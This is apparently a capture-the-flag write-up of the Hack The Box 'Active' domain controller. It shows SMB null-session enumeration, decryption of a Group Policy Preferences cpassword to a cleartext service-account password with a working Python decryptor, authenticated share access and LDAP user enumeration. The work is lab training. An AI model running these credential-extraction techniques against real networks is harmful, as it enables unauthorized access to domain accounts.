If you're interested in more Active Directory fun, check out my previous article on over-permissive file shares: https://medium.com/@jabaribrown62/the-danger-of-over-permissive-file-shares-bea10fab5190
Now let's start our journey with an Nmap scan.
jbrown@Jabaris-MacBook-Pro active % sudo nmap -sV -sC -O -T4 10.129.5.64
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-12 07:32 -0400
Nmap scan report for 10.129.5.64
Host is up (0.036s latency).
Not shown: 983 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-12 11:32:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Device type: general purpose
Running: Microsoft Windows 2008|7|Vista|8.1
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Vista SP2 or Windows 7 or Windows Server 2008 R2 or Windows 8.1
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-03-12T11:33:39
|_ start_date: 2026-03-12T11:24:33
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.62 seconds

From the scan results we can see LDAP (389 and the global catalog on 3268) running alongside Kerberos (88) and SMB (445), and the LDAP banner hands us the domain name: active.htb. Kerberos plus LDAP plus DNS on a host that calls itself DC means we're looking at a domain controller. Two details worth noting before we touch anything: the build is Server 2008 R2 SP1 (very old), and smb2-security-mode reports signing enabled and required, so SMB relay against this host is off the table.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-12 11:32:40Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
Host script results:
| smb2-time:
| date: 2026-03-12T11:33:39
|_ start_date: 2026-03-12T11:24:33
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required

At this point we have two options. We can check if an anonymous bind to LDAP is allowed, or test for anonymous access on the SMB shares.
Let's start with the SMB share and see if anonymous access is allowed using NetExec.
jbrown@Jabaris-MacBook-Pro active % nxc smb 10.129.5.64 -u anonymous -p ""
SMB 10.129.5.64 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.64 445 DC [-] active.htb\anonymous: STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro active % nxc smb 10.129.5.64 -u anonymous -p anonymous
SMB 10.129.5.64 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.64 445 DC [-] active.htb\anonymous:anonymous STATUS_LOGON_FAILURE
jbrown@Jabaris-MacBook-Pro active %
That isn't a null session yet. Passing anonymous as the username makes the DC look for a real account called anonymous, which doesn't exist, hence STATUS_LOGON_FAILURE both times. Let's try again using empty strings for both the username and the password. While researching this, I learned the nuance between a null session and a guest/anonymous account.
Quick summary:
A null session (empty username and empty password) doesn't authenticate as any user at all. The SMB session setup is accepted as an anonymous logon (the ANONYMOUS LOGON identity), and the client typically connects to the IPC$ share to enumerate shares, users and groups. NetExec actually told us this was possible up front: the Null Auth:True in its banner. How much an anonymous session is allowed to do is governed by the RestrictAnonymous and RestrictAnonymousSAM values under HKLM\SYSTEM\CurrentControlSet\Control\Lsa (RestrictAnonymous=1 blocks enumeration of SAM accounts and shares, 2 denies anonymous access without explicit permissions), so open ports alone tell you nothing; you have to try it.
In this case, the null session works and allows us to access the SMB shares.
jbrown@Jabaris-MacBook-Pro active % nxc smb 10.129.5.64 -u '' -p ''
SMB 10.129.5.64 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.64 445 DC [+] active.htb\:
jbrown@Jabaris-MacBook-Pro active %

Now that we have access, we can enumerate the SMB shares and see what permissions we have. It looks like we only have READ access to the Replication share; SYSVOL and NETLOGON, which usually carry the same policy files, show no permissions for the anonymous session.
To dig a little deeper, we can use the spider_plus module to walk the share and record every file it can see. With DOWNLOAD_FLAG at its default of False it only collects metadata (path, timestamps, size) into a JSON file, which is enough to spot anything interesting before we pull it down.
jbrown@Jabaris-MacBook-Pro active % nxc smb 10.129.5.64 -u '' -p '' --shares
SMB 10.129.5.64 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.64 445 DC [+] active.htb\:
SMB 10.129.5.64 445 DC [*] Enumerated shares
SMB 10.129.5.64 445 DC Share Permissions Remark
SMB 10.129.5.64 445 DC ----- ----------- ------
SMB 10.129.5.64 445 DC ADMIN$ Remote Admin
SMB 10.129.5.64 445 DC C$ Default share
SMB 10.129.5.64 445 DC IPC$ Remote IPC
SMB 10.129.5.64 445 DC NETLOGON Logon server share
SMB 10.129.5.64 445 DC Replication READ
SMB 10.129.5.64 445 DC SYSVOL Logon server share
SMB 10.129.5.64 445 DC Users
jbrown@Jabaris-MacBook-Pro active %
jbrown@Jabaris-MacBook-Pro active % nxc smb 10.129.5.64 -u '' -p '' --shares -M spider_plus
SMB 10.129.5.64 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.64 445 DC [+] active.htb\:
SPIDER_PLUS 10.129.5.64 445 DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.5.64 445 DC [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.5.64 445 DC [*] STATS_FLAG: True
SPIDER_PLUS 10.129.5.64 445 DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.5.64 445 DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.5.64 445 DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.5.64 445 DC [*] OUTPUT_FOLDER: /Users/jbrown/.nxc/modules/nxc_spider_plus
SMB 10.129.5.64 445 DC [*] Enumerated shares
SMB 10.129.5.64 445 DC Share Permissions Remark
SMB 10.129.5.64 445 DC ----- ----------- ------
SMB 10.129.5.64 445 DC ADMIN$ Remote Admin
SMB 10.129.5.64 445 DC C$ Default share
SMB 10.129.5.64 445 DC IPC$ Remote IPC
SMB 10.129.5.64 445 DC NETLOGON Logon server share
SMB 10.129.5.64 445 DC Replication READ
SMB 10.129.5.64 445 DC SYSVOL Logon server share
SMB 10.129.5.64 445 DC Users
SPIDER_PLUS 10.129.5.64 445 DC [+] Saved share-file metadata to "/Users/jbrown/.nxc/modules/nxc_spider_plus/10.129.5.64.json".
SPIDER_PLUS 10.129.5.64 445 DC [*] SMB Shares: 7 (ADMIN$, C$, IPC$, NETLOGON, Replication, SYSVOL, Users)
SPIDER_PLUS 10.129.5.64 445 DC [*] SMB Readable Shares: 1 (Replication)
SPIDER_PLUS 10.129.5.64 445 DC [*] Total folders found: 22
SPIDER_PLUS 10.129.5.64 445 DC [*] Total files found: 7
SPIDER_PLUS 10.129.5.64 445 DC [*] File size average: 1.16 KB
SPIDER_PLUS 10.129.5.64 445 DC [*] File size min: 22 B
SPIDER_PLUS 10.129.5.64 445 DC [*] File size max: 3.63 KB
jbrown@Jabaris-MacBook-Pro active % cat ~/.nxc/modules/nxc_spider_plus/10.129.5.64.json
{
"Replication": {
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "23 B"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "119 B"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "1.07 KB"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "533 B"
},
"active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "2.72 KB"
},
"active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "22 B"
},
"active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2018-07-21 06:37:44",
"ctime_epoch": "2018-07-21 06:37:44",
"mtime_epoch": "2018-07-21 06:38:11",
"size": "3.63 KB"
}
}
}
jbrown@Jabaris-MacBook-Pro active %

Next, I like to use smbclient.py to grab the files from the share.
jbrown@Jabaris-MacBook-Pro examples % python3 smbclient.py -target-ip 10.129.5.64 -no-pass target
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Replication
# dir
*** Unknown syntax: dir
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 active.htb
# cd active.htb
# cd Policies
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
# cd {31B2F340-016D-11D2-945F-00C04FB984F9}
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
-rw-rw-rw- 23 Sat Jul 21 06:38:11 2018 GPT.INI
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 Group Policy
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 MACHINE
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 USER
# cd USER
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
# cd ..
# cd MACHINE
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 Microsoft
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 Preferences
-rw-rw-rw- 2788 Sat Jul 21 06:38:11 2018 Registry.pol
# get Registry.pol
# cd Preferences
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 Groups
# cd Groups
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
-rw-rw-rw- 533 Sat Jul 21 06:38:11 2018 Groups.xml
# get Groups.xml
# cd Windows NT
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 SecEdit
# cd SecEdit
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
-rw-rw-rw- 1098 Sat Jul 21 06:38:11 2018 GptTmpl.inf
# get GptTmpl.inf
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
# cd {6AC1786C-016F-11D2-945F-00C04fB984F9}
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
-rw-rw-rw- 22 Sat Jul 21 06:38:11 2018 GPT.INI
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 MACHINE
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 USER
# get GPT.INI
# cd Machine
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 Microsoft
# cd Microsoft
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 Windows NT
# cd Windows NT
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 SecEdit
# cd SecEdit
# ls
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 .
drw-rw-rw- 0 Sat Jul 21 06:37:44 2018 ..
-rw-rw-rw- 3722 Sat Jul 21 06:38:11 2018 GptTmpl.inf
# get GptTmpl.inf
#

Looking at Groups.xml (a Group Policy Preferences file sitting under MACHINE/Preferences/Groups of {31B2F340-016D-11D2-945F-00C04FB984F9}, which is the well-known GUID of the Default Domain Policy), we can see that it contains a cpassword value for a service account, active.htb\SVC_TGS.
jbrown@Jabaris-MacBook-Pro active % cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
jbrown@Jabaris-MacBook-Pro active %

After doing some quick research, it looks like this is a Group Policy Preferences (GPP) password, a well-known vulnerability that was actually introduced by Microsoft itself (lol). GPP lets admins push local users and groups, scheduled tasks, services and mapped drives through XML policy files in SYSVOL, and when one of those carried a password it was stored in the cpassword attribute encrypted with AES-256. The catch is that Microsoft published the AES key in its own documentation on MSDN, so anyone who can read the file can decrypt it, and since every domain user can read SYSVOL that means everyone. MS14-025 (CVE-2014-1812) removed the ability to set new passwords this way, but it didn't delete the ones already there, which is why they still turn up in old GPOs and, as here, in copies of SYSVOL.
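To show what a decryptor like gpp-decrypt actually does, here is an added Python example (my code, not the author's and not the gpp-decrypt project's). It restores the base64 padding that GPP strips, runs AES-256-CBC with the published key and an all-zero IV, removes the PKCS#7 padding, decodes the UTF-16LE plaintext, and also walks a GPP XML file for every cpassword it carries. It assumes one AES backend is available: the cryptography package, pycryptodome, or the openssl command line. The embedded XML is the Groups.xml pulled from the Replication share above.

```python
import base64
import subprocess
import xml.etree.ElementTree as ET

# The AES-256 key Microsoft published on MSDN for GPP cpassword values; the IV is all zeros.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_IV = bytes(16)

# Attributes that name the account next to a cpassword, across the different GPP file types
# (userName: Groups/Drives/DataSources, runAs: ScheduledTasks, accountName: Services).
_NAME_ATTRS = ("userName", "runAs", "accountName", "newName")


def _aes256_cbc_decrypt(data: bytes) -> bytes:
    """Raw AES-256-CBC decrypt, no padding removal. Tries the cryptography package,
    then pycryptodome, then the openssl CLI (assumption: one of the three exists)."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(GPP_IV)).decryptor()
        return dec.update(data) + dec.finalize()
    except ImportError:
        pass
    try:
        from Crypto.Cipher import AES
        return AES.new(GPP_AES_KEY, AES.MODE_CBC, GPP_IV).decrypt(data)
    except ImportError:
        pass
    proc = subprocess.run(
        ["openssl", "enc", "-d", "-aes-256-cbc", "-nopad",
         "-K", GPP_AES_KEY.hex(), "-iv", GPP_IV.hex()],
        input=data, capture_output=True, check=True)
    return proc.stdout


def decrypt_cpassword(cpassword: str) -> str:
    # GPP strips the '=' padding from the base64 text; put it back before decoding.
    padded = cpassword + "=" * (-len(cpassword) % 4)
    ciphertext = base64.b64decode(padded)
    if not ciphertext or len(ciphertext) % 16:
        raise ValueError("cpassword is not a whole number of AES blocks")
    plain = _aes256_cbc_decrypt(ciphertext)
    # The plaintext is UTF-16LE with PKCS#7 padding. A 26-character password is 52 bytes,
    # so it is padded with twelve 0x0c bytes, which gpp-decrypt printed as six U+0C0C
    # characters because it skipped this step.
    pad = plain[-1]
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: wrong key or corrupted value")
    return plain[:-pad].decode("utf-16-le")


def find_gpp_creds(xml_text: str):
    """Walk any GPP XML (Groups.xml, ScheduledTasks.xml, Services.xml, Drives.xml,
    DataSources.xml, Printers.xml) and return (account, cleartext password) pairs."""
    creds = []
    for elem in ET.fromstring(xml_text.encode("utf-8")).iter():
        cp = elem.get("cpassword")
        if not cp:
            continue
        name = next((elem.get(a) for a in _NAME_ATTRS if elem.get(a)), "<unknown>")
        creds.append((name, decrypt_cpassword(cp)))
    return creds


# The Groups.xml retrieved from the Replication share (the file shown in this post).
GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
</Groups>"""

if __name__ == "__main__":
    for account, password in find_gpp_creds(GROUPS_XML):
        print(f"{account}: {password}")
```

When hunting for these in a real environment, grep the whole SYSVOL tree (and any stale copies of it, like this Replication share) for the string cpassword rather than only opening Groups.xml; the same attribute shows up in the scheduled task, service, drive, data source and printer preference files.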
jbrown@Jabaris-MacBook-Pro tools % gpp-decrypt
usage: gpp-decrypt [-h] [-v] [--verbose] [--no-banner] (-f FILE | -c CPASS)
gpp-decrypt: error: one of the arguments -f/--file -c/--cpassword is required
jbrown@Jabaris-MacBook-Pro tools % gpp-decrypt -c "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
[ • ] GPP-Decrypt v2.0.0 - Group Policy Preferences Password Decryptor
[ • ] Author: Kristof Toth (@t0thkr1s)
[ ✓ ] Decrypted password: GPPstillStandingStrong2k18ఌఌఌఌఌఌ
jbrown@Jabaris-MacBook-Pro tools %

The trailing ఌ characters are not part of the password. The decrypted plaintext is UTF-16LE with PKCS#7 padding, and gpp-decrypt printed the twelve 0x0C padding bytes as six U+0C0C characters instead of stripping them. The real password is GPPstillStandingStrong2k18. Now that we have credentials for a new account, we can check again to see whether they unlock any additional SMB shares.
jbrown@Jabaris-MacBook-Pro active % nxc smb 10.129.5.64 -u SVC_TGS -p GPPstillStandingStrong2k18 --shares
SMB 10.129.5.64 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.64 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.129.5.64 445 DC [*] Enumerated shares
SMB 10.129.5.64 445 DC Share Permissions Remark
SMB 10.129.5.64 445 DC ----- ----------- ------
SMB 10.129.5.64 445 DC ADMIN$ Remote Admin
SMB 10.129.5.64 445 DC C$ Default share
SMB 10.129.5.64 445 DC IPC$ Remote IPC
SMB 10.129.5.64 445 DC NETLOGON READ Logon server share
SMB 10.129.5.64 445 DC Replication READ
SMB 10.129.5.64 445 DC SYSVOL READ Logon server share
SMB 10.129.5.64 445 DC Users READ
jbrown@Jabaris-MacBook-Pro active %

I ran into some hiccups with NetExec while trying to spider the share, but that's okay. We already know we have read access to the Users share, so we can just use smbclient.py instead.
jbrown@Jabaris-MacBook-Pro examples % python3 smbclient.py active.htb/SVC_TGS@10.129.5.64
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# use Users
# ls
drw-rw-rw- 0 Sat Jul 21 10:39:20 2018 .
drw-rw-rw- 0 Sat Jul 21 10:39:20 2018 ..
drw-rw-rw- 0 Mon Jul 16 06:14:21 2018 Administrator
drw-rw-rw- 0 Mon Jul 16 17:08:56 2018 All Users
drw-rw-rw- 0 Mon Jul 16 17:08:47 2018 Default
drw-rw-rw- 0 Mon Jul 16 17:08:56 2018 Default User
-rw-rw-rw- 174 Mon Jul 16 17:01:17 2018 desktop.ini
drw-rw-rw- 0 Mon Jul 16 17:08:47 2018 Public
drw-rw-rw- 0 Sat Jul 21 11:16:32 2018 SVC_TGS
# cd Public
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
# cd All Users
[-] SMB SessionError: code: 0x8000002d - STATUS_STOPPED_ON_SYMLINK - The create operation stopped after reaching a symbolic link.
# cd SVC_TGS
# ls
drw-rw-rw- 0 Sat Jul 21 11:16:32 2018 .
drw-rw-rw- 0 Sat Jul 21 11:16:32 2018 ..
drw-rw-rw- 0 Sat Jul 21 11:14:20 2018 Contacts
drw-rw-rw- 0 Sat Jul 21 11:14:42 2018 Desktop
drw-rw-rw- 0 Sat Jul 21 11:14:28 2018 Downloads
drw-rw-rw- 0 Sat Jul 21 11:14:50 2018 Favorites
drw-rw-rw- 0 Sat Jul 21 11:15:00 2018 Links
drw-rw-rw- 0 Sat Jul 21 11:15:23 2018 My Documents
drw-rw-rw- 0 Sat Jul 21 11:15:40 2018 My Music
drw-rw-rw- 0 Sat Jul 21 11:15:50 2018 My Pictures
drw-rw-rw- 0 Sat Jul 21 11:16:05 2018 My Videos
drw-rw-rw- 0 Sat Jul 21 11:16:20 2018 Saved Games
drw-rw-rw- 0 Sat Jul 21 11:16:32 2018 Searches
# cd Desktop
# ls
drw-rw-rw- 0 Sat Jul 21 11:14:42 2018 .
drw-rw-rw- 0 Sat Jul 21 11:14:42 2018 ..
-rw-rw-rw- 34 Thu Mar 12 07:25:39 2026 user.txt
# get user.txt
#
I moved the flag to the Active Directory box and voilà — magic. (Future voice 😄)
jbrown@Jabaris-MacBook-Pro active % cat user.txt
***UserFlagFoundHere***
jbrown@Jabaris-MacBook-Pro active %

Now let's load up PowerView.py and begin enumerating during the post-exploitation phase.
╭─LDAP─[DC.active.htb]─[ACTIVE\SVC_TGS]-[NS:10.129.5.64]
╰─ ❯ Get-DomainUser
objectClass : top
person
organizationalPerson
user
cn : SVC_TGS
distinguishedName : CN=SVC_TGS,CN=Users,DC=active,DC=htb
name : SVC_TGS
objectGUID : {8c9d3235-1d0a-4db1-99ee-3f783d1a9bd6}
userAccountControl : NORMAL_ACCOUNT
DONT_EXPIRE_PASSWORD
badPwdCount : 0
badPasswordTime : 12/03/2026 18:47:35 (today)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 12/03/2026 18:48:17 (today)
pwdLastSet : 18/07/2018 20:14:38 (7 years, 7 months ago)
primaryGroupID : 513
objectSid : S-1-5-21-405608879-3187717380-1996298813-1103
sAMAccountName : SVC_TGS
sAMAccountType : SAM_USER_OBJECT
userPrincipalName : SVC_TGS@active.htb
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
lastLogonTimestamp : 12/03/2026 18:48:17 (today)
vulnerabilities : [VULN-002] User account with password that never expires (LOW)
objectClass : top
person
organizationalPerson
user
cn : krbtgt
description : Key Distribution Center Service Account
distinguishedName : CN=krbtgt,CN=Users,DC=active,DC=htb
memberOf : CN=Denied RODC Password Replication Group,CN=Users,DC=active,DC=htb
name : krbtgt
objectGUID : {43d7a1e7-a5a6-49ab-82d0-e24e7472f88d}
userAccountControl : ACCOUNTDISABLE
NORMAL_ACCOUNT
badPwdCount : 0
badPasswordTime : 01/01/1601 00:00:00 (425 years, 2 months ago)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 01/01/1601 00:00:00 (425 years, 2 months ago)
pwdLastSet : 18/07/2018 18:50:36 (7 years, 7 months ago)
primaryGroupID : 513
objectSid : S-1-5-21-405608879-3187717380-1996298813-502
adminCount : 1
sAMAccountName : krbtgt
sAMAccountType : SAM_USER_OBJECT
servicePrincipalName : kadmin/changepw
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
objectClass : top
person
organizationalPerson
user
cn : Guest
description : Built-in account for guest access to the computer/domain
distinguishedName : CN=Guest,CN=Users,DC=active,DC=htb
memberOf : CN=Guests,CN=Builtin,DC=active,DC=htb
name : Guest
objectGUID : {128734a9-ff0e-4f5c-8c95-a14738a11801}
userAccountControl : ACCOUNTDISABLE
PASSWD_NOTREQD
NORMAL_ACCOUNT
DONT_EXPIRE_PASSWORD
badPwdCount : 0
badPasswordTime : 01/01/1601 00:00:00 (425 years, 2 months ago)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 01/01/1601 00:00:00 (425 years, 2 months ago)
pwdLastSet : 01/01/1601 00:00:00 (425 years, 2 months ago)
primaryGroupID : 514
objectSid : S-1-5-21-405608879-3187717380-1996298813-501
sAMAccountName : Guest
sAMAccountType : SAM_USER_OBJECT
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
objectClass : top
person
organizationalPerson
user
cn : Administrator
description : Built-in account for administering the computer/domain
distinguishedName : CN=Administrator,CN=Users,DC=active,DC=htb
memberOf : CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb
CN=Domain Admins,CN=Users,DC=active,DC=htb
CN=Enterprise Admins,CN=Users,DC=active,DC=htb
CN=Schema Admins,CN=Users,DC=active,DC=htb
CN=Administrators,CN=Builtin,DC=active,DC=htb
name : Administrator
objectGUID : {25ca718e-7312-467f-955a-4c4f10963c1e}
userAccountControl : NORMAL_ACCOUNT
DONT_EXPIRE_PASSWORD
badPwdCount : 0
badPasswordTime : 30/07/2018 17:17:35 (7 years, 7 months ago)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 12/03/2026 11:25:43 (today)
pwdLastSet : 18/07/2018 19:06:40 (7 years, 7 months ago)
primaryGroupID : 513
objectSid : S-1-5-21-405608879-3187717380-1996298813-500
adminCount : 1
sAMAccountName : Administrator
sAMAccountType : SAM_USER_OBJECT
servicePrincipalName : active/CIFS:445
